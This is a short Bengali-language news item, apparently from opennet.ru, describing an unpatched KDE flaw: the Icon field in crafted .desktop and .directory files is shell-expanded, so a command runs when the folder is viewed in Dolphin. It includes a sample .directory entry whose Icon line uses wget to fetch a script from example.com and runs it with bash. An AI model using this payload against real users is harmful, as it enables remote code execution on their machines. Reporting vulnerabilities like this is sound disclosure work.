কেডিইতে , যা একজন আক্রমণকারীকে নির্বিচারে আদেশ কার্যকর করার অনুমতি দেয় যখন একজন ব্যবহারকারী বিশেষভাবে ডিজাইন করা ".desktop" এবং ".directory" ফাইল সমন্বিত একটি ডিরেক্টরি বা সংরক্ষণাগার দেখেন। একটি আক্রমণের জন্য ব্যবহারকারীকে ডলফিন ফাইল ম্যানেজারে ফাইলগুলির একটি তালিকা দেখতে, একটি দূষিত ডেস্কটপ ফাইল ডাউনলোড করতে বা ডেস্কটপে বা একটি নথিতে একটি শর্টকাট টেনে আনতে হবে৷ সমস্যাটি লাইব্রেরির বর্তমান রিলিজে নিজেকে প্রকাশ করে এবং পুরানো সংস্করণ, কেডিই 4 পর্যন্ত। দুর্বলতা এখনও রয়েছে (CVE বরাদ্দ করা হয়নি)।
সমস্যাটি KDesktopFile ক্লাসের ভুল বাস্তবায়নের কারণে হয়েছে, যেটি "আইকন" ভেরিয়েবলের প্রক্রিয়াকরণের সময়, সঠিকভাবে এস্কেপিং ছাড়াই, মানটিকে KConfigPrivate::expandString() ফাংশনে প্রেরণ করে, যা প্রক্রিয়াকরণ সহ শেল বিশেষ অক্ষরগুলির সম্প্রসারণ করে। স্ট্রিং "$(..)" কমান্ড হিসাবে কার্যকর করা হবে। এক্সডিজি স্পেসিফিকেশন, বাস্তবায়নের প্রয়োজনীয়তার বিপরীতে শেল কনস্ট্রাক্ট সেটিংসের ধরন আলাদা না করেই তৈরি করা হয়, যেমন শুধুমাত্র লঞ্চ করা অ্যাপ্লিকেশনটির কমান্ড লাইন নির্ধারণ করার সময় নয়, ডিফল্টরূপে প্রদর্শিত আইকনগুলি নির্দিষ্ট করার সময়ও।
উদাহরণস্বরূপ, আক্রমণ করা ব্যবহারকারীকে একটি ডিরেক্টরি সহ একটি জিপ সংরক্ষণাগার পাঠান যেখানে একটি ".directory" ফাইল রয়েছে যেমন:
[ডেস্কটপ এন্ট্রি] টাইপ=ডিরেক্টরি
আইকন[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
আপনি যখন ডলফিন ফাইল ম্যানেজারে সংরক্ষণাগারের বিষয়বস্তু দেখার চেষ্টা করবেন, তখন স্ক্রিপ্ট https://example.com/FILENAME.sh ডাউনলোড হবে এবং কার্যকর করা হবে।
উত্স: opennet.ru